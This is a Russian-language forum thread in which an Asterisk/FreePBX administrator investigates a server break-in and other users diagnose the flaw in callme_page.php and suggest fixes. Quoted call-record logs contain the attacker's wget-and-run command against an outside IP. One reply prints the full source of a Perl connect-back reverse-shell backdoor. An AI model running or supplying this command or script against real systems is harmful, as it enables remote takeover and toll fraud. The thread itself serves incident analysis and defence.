First time here? Check out the FAQ!

Пожалуйста, войдите здесь. Часто задаваемые вопросы О нас
Задайте Ваш вопрос

взлом астриск

1

вломали пару атс. версия астериска 1.8.7.0

в логах cdr вот такая фигня.

system (echo Fucked> /var/www/html/recordings/misc/x )

внимаение вопрос. как запустили команду system?

вот другой пример

рекомендую всем проверить сдр на предмет lastapp='system'. ибо в нормальной фрипбкс такого нету. mysql> select * from asteriskcdrdb.cdr where lastapp='system' -> ; +---------------------+------+-----+-----+---------------+--------------------------------+------------+---------+-----------------------------------------------------------------------+----------+---------+-------------+----------+-------------+------------------+-----------+ | calldate | clid | src | dst | dcontext | channel | dstchannel | lastapp | lastdata | duration | billsec | disposition | amaflags | accountcode | uniqueid | userfield | +---------------------+------+-----+-----+---------------+--------------------------------+------------+---------+-----------------------------------------------------------------------+----------+---------+-------------+----------+-------------+------------------+-----------+ | 2012-04-06 02:20:11 | | | 98 | from-internal | Local/98@from-internal-a155;1 | | System | wget http://80.68.94.143/dc -O /tmp/dc;perl /tmp/dc 80.68.94.143 3000 | 0 | 0 | ANSWERED | 3 | | 1333664411.20963 | | | 2012-04-07 23:31:34 | | | 98 | from-internal | Local/98@from-internal-1655;1 | | System | wget http://80.68.94.143/dc -O /tmp/dc;perl /tmp/dc 80.68.94.143 3000 | 1 | 1 | ANSWERED | 3 | | 1333827094.22524 | | +---------------------+------+-----+-----+---------------+--------------------------------+------------+---------+-----------------------------------------------------------------------+----------+---------+-------------+----------+-------------+------------------+-----------+ 2 rows in set (0.01 sec)

самое интересно что нет src вообще

спросил Apr 8 '12

meral Gravatar meral flag of Ukraine
23347 24 20 177
http://pro-sip.net/

обновил Apr 8 '12

Comments

А в логах-то что???

switch (Apr 8 '12)edit

да в том то и дело что ничего особенного. ну после взлома слив ттрафика на платные номера.

meral (Apr 8 '12)edit

Сервер смотрел наружу сетевым интерфейсом?

switch (Apr 8 '12)edit

эпический вопрос, в духе: а сервер был включен в розетку?

um2010 (Apr 8 '12)edit

сервер был сам снаружи.

meral (Apr 8 '12)edit

9 Ответов

2

Запустили через /var/www/html/recordings/misc/callme_page.php .

Так что закрывайте доступ к этой директории.

sed -i 's/\(<?php\)/\1\nexit;/' /var/www/html/recordings/misc/callme_page.php
echo
-e "Order allow,deny \nDeny from all" >> /var/www/html/recordings/.htaccess
ссылка удалить спам редактировать

ответил Apr 8 '12

zzuz Gravatar zzuz flag of Russian Federation
7174 2 6 75
http://line24.ru/

обновил Apr 8 '12

Comments

так там же авторизация. не могу закрытьэто основное свойства данной пары.

meral (Apr 8 '12)edit

Тогда достаточно callme_page.php убрать .

zzuz (Apr 8 '12)edit

переработать скрипт, усилить всю безопасность, ограничить ойпишнеки

um2010 (Apr 8 '12)edit

ну пока поменял путь к этой директории и убрал апач поставил nginx через https с доступом только к конкретной диерктории.

meral (Apr 8 '12)edit
1

а может не стоит выставлять в дикий нет, столько потенциально дырявого софта? делайте простенькие sbc, где доступны 3-4 порта (Os+asterisk\freeswith+fail2ban или pfsense+freeswitch)..

ссылка удалить спам редактировать

ответил Apr 9 '12

svoy Gravatar svoy
1603 1 4 20
http://svoy.in.ua/

Comments

это был риторический вопрос? freeswitch я бы вообще в нет не выставлял.

meral (Apr 10 '12)edit

это ценный совет и походу самый действенный, если даже ты не уберегся от ломателей...

svoy (Apr 10 '12)edit

гы. порсто нет смысла тратить время на защиту от взлома на впсках по 20 евро в месяц. и я какбы не специалист по безопасности.

meral (Apr 11 '12)edit

но претензии ведь к тебе будут, что не предостерег от глупого выбора заказчика ;) сливают ведь не на 20 евро..

svoy (Apr 11 '12)edit

на 150 слили. 150 мое время по переустановке.

meral (Apr 11 '12)edit
1

http://seclists.org/fulldisclosure/2012/Mar/234

Уязвимость найдена в FrePBX версий 2.6-2.10

http://www.freepbx.org/trac/ticket/5711

ссылка удалить спам редактировать

ответил Apr 9 '12

Olpag Gravatar Olpag
2024 3 6 30

обновил Apr 9 '12

Comments

Спасибо , КЭП.

zzuz (Apr 9 '12)edit
1

Че-то тоскливо как-то становится, вторая уязвимость за месяц, позволяющая утащить все. Месяц назад выплыл баг в vTiger http://elastix.org/index.php/en/component/kunena/116-security/98468-vtiger-vulnerability.html.

Имхо, для всех коробок, хоть как-то смотрящих в инет надо в .htaccess добавлять что-то вроде:

AuthUserFile /var/www/.htpasswd
AuthType Basic
AuthName "Enter login and password"
Require valid-user
Order deny,allow
Deny from all
Allow from <trusted IP's>
Satisfy Any

иначе заклюют...

ссылка удалить спам редактировать

ответил Apr 9 '12

lash Gravatar lash
167 7 2 10
0

Возможно через Manager.

Покажите

netstat -nltup|grep asterisk
ссылка удалить спам редактировать

ответил Apr 8 '12

ro Gravatar ro flag of Russian Federation
404 1 1 11
http://rootblog.ru/

Comments

менеджер только на локалхост открыт. или в нем уязвимость есть?

meral (Apr 8 '12)edit

Не понял ответа сначала. Если только на локалхост, то уже неважно, есть уязвимости в самом менеджере или нет.

ro (Apr 8 '12)edit
0

АТС как то связаны между собой?

ссылка удалить спам редактировать

ответил Apr 8 '12

Злобный Мыш Gravatar Злобный Мыш
292 13 5 16

Comments

да. в одной подсети находятся.больше ничего.

meral (Apr 8 '12)edit
0

Троянчик worsyn скачивает такую херь:

#!/usr/bin/perl
use Socket;
print "Data Cha0s Connect Back Backdoor\n\n";
if (!$ARGV[0]) {
printf
"Usage: $0 [Host] <Port>\n";
exit(1);
}
print "[*] Dumping Arguments\n";
$host
= $ARGV[0];
$port
= 80;
if ($ARGV[1]) {
$port
= $ARGV[1];
}
print "[*] Connecting...\n";
$proto
= getprotobyname('tcp') || die("Unknown Protocol\n");
socket
(SERVER, PF_INET, SOCK_STREAM, $proto) || die ("Socket Error\n");
my $target = inet_aton($host);
if (!connect(SERVER, pack "SnA4x8", 2, $port, $target)) {
die("Unable to Connect\n");
}
print "[*] Spawning Shell\n";
if (!fork( )) {
open
(STDIN,">&SERVER");
open
(STDOUT,">&SERVER");
open
(STDERR,">&SERVER");
exec {'/bin/sh'} '-bash' . "\0" x 4;
exit(0);
}
print "[*] Datached\n\n";

собственно после чего, он может сделать всё что хошь.. такой радмин получается

залазим, к примеу, так: http://www.chovy.com/personal/simiens-crew-2005-how-they-did-it/

ссылка удалить спам редактировать

ответил Apr 8 '12

um2010 Gravatar um2010
2056 70 13 55

обновил Apr 8 '12

Comments

да троянчика я прочитал уже. меня интересует что мне сделать чтоб эту дырку закрыть.а именно КАК они его вызвали то.

meral (Apr 8 '12)edit

Выше ответ. ломают повально через Recordings .Скачивают бекдор запускают и проксиуют трафик. всё просто.

zzuz (Apr 8 '12)edit

Меня, на этой католическо-пасхальной неделе, fail2ban заваливает письмами о попытках перебора аккаунтов. Всегда на праздниках оживляются совлочи,....

alphil (Apr 8 '12)edit
0

А полнее то строчка сдр какая? И нет ли на серваке wordpress ?

ссылка удалить спам редактировать

ответил Apr 8 '12

um2010 Gravatar um2010
2056 70 13 55

Comments

нет.чистый астериск и фрипбкс. полная строчка странная. похоже на запуск call-скриптом.

meral (Apr 8 '12)edit

это worsyn троян, лезет через уязвимости httpб не исключено, что через морду freepbx

um2010 (Apr 8 '12)edit

http://www.chovy.com/personal/simiens-crew-2005-how-they-did-it/ а вот и инструкция-пример как влезть

um2010 (Apr 8 '12)edit
-1

Вот рассказывал мне кто-то не так давно про разные системы обнаружения вторжений и fail2ban-ы... Если внешние коннекты к АТСке идут со статики - то я режу айпишники фаерволом, если таких много и откуда угодно - то ВПН и не морочить яйца. Есессно защиту от перебора паролей ВПНа никто не отменял, но так никто не увидит что у вас сип наружу торчит

ссылка удалить спам редактировать

ответил Apr 12 '12

asdev Gravatar asdev flag of Ukraine
244 21 6 15

Comments

1

Прям КЭП.. Спасибо!

zzuz (Apr 12 '12)edit

ну так ты крут. только вот чето мои клиенты не хотят так. не знаешь чего? и никто ничего не перебирал. просто взяли и в одно действие взломали.

meral (Apr 12 '12)edit

Там такой же админ прошаренный сидел , фильтровал всё по портам)

zzuz (Apr 12 '12)edit

А не пробовали объяснять что вываливание порта наружу чревато потерей бабок? Видимо поломали не в 1 действие, просто просканили грамотно. Клиент того же ППТП ВПН есть практически в любой системе, и айфонах, и на винде, и на линухах, везде. Настроить сервер пптп - 5 минут. Порезать айпишники - тоже несложно. А различные системы обнаружения спасают разве что в случае публичных веб и фтп серверов, когда пользователей огромное кол-во и они не авторизовываются. А вываливать порт астериски наружу и надеяться на то что атаку обнаружат - это как бороться с поносом, ограничивая доступ в сортир. Целенаправленный взлом в этом случае - вопрос времени. А если у вас ещё и веб-морда торчит наружу, то очень недолгого времени

asdev (Apr 13 '12)edit

чукча писатель? прочитай вот написано как поломали. в логах http сервера нет никаких подборов. у меня имеенно публичная сервер. еще и не мой а клиента. а еще у клиента КОРОБОЧКИ на динамических адресах. какое нафиг pptp? вообще возникакет впечатление что вы нкиогда с частными клиентами не работали.

meral (Apr 13 '12)edit

Я писал про возможность подбора впн паролей. А просканить диапазон айпишников на предмет наличия какого-то дырявого пхп файла - нех делать, вы и не заметите этого, т.к. это и не скан вовсе, если сервер публичный и к веб-морде имеют доступ много народа. Коробочки на динамических адресах имеют прямой доступ в инет? Установка между коробочкой и каналом инета любого роутера за 20-30 уе уже позволит поднять впн канал, кроме того, многие коробочки умеют ПППоЕ, сервер которого тоже можно поднять. Если сервер публичный - что там ещё крутится? Или астериск у вас - публичный? С доступом всем?

asdev (Apr 13 '12)edit

нет.ну точно маленький.коробочка 30 баксиков.давайте перед нет еще на 30 поставим роутер. коробочки дома у сотрудников. какой может быть там pppoe? и да, представте у коробочек ДИНАМИЧЕСКИЕ адреса. и мне они НЕИзВЕСТНЫ заранее.

meral (Apr 13 '12)edit

все. больше не отвечают. астериск не является корпоративным свичем.он вот как раз на частников расчитан которые ничего за "всего 30 уе" усложняющего установку "всего на полчаса работы админа" ставить не будут.

meral (Apr 13 '12)edit

А что за коробочки? Модели есть? В случае ВПН подключения пофигу какие у коробочек адреса, т.к. им назначаются адреса ВПН сети и сам сервер маршрутизирует на них траффик. Грубо говоря, если у вас на телефоне есть сип-звонилка и впн клиент, вы поехали в другую страну, подключились в ближайшем макдаке к вайфаю, и к впн серверу - у вас будет внутренний статический айпишник впн сети, который выдаётся сервером по вашему логину/паролю

asdev (Apr 13 '12)edit

мда. похоже я идиот. без коментариев.

meral (Apr 13 '12)edit

Да нормуль. Не парься . Это обычный тролль. Из тех кто постоянно философствует , а потом пишет на форумах "не могу зарегестрировать транк от Манго офиса...".

zzuz (Apr 13 '12)edit

Ваш ответ

Please start posting your answer anonymously - your answer will be saved within the current session and published after you log in or create a new account. Please try to give a substantial answer, for discussions, please use comments and please do remember to vote (after you log in)!
[скрыть предварительный просмотр]

Закладки и информация

Добавить закладку
2 закладки

подписаться на rss ленту новостей

Статистика

Задан: Apr 8 '12

Просмотрен: 3,400 раз

Обновлен: Apr 12 '12

Проект компании "АТС Дизайн"
Asterisk® и Digium® являются зарегистрированными торговыми марками компании Digium, Inc., США.
IP АТС Asterisk распространяется под лицензией GNU GPL.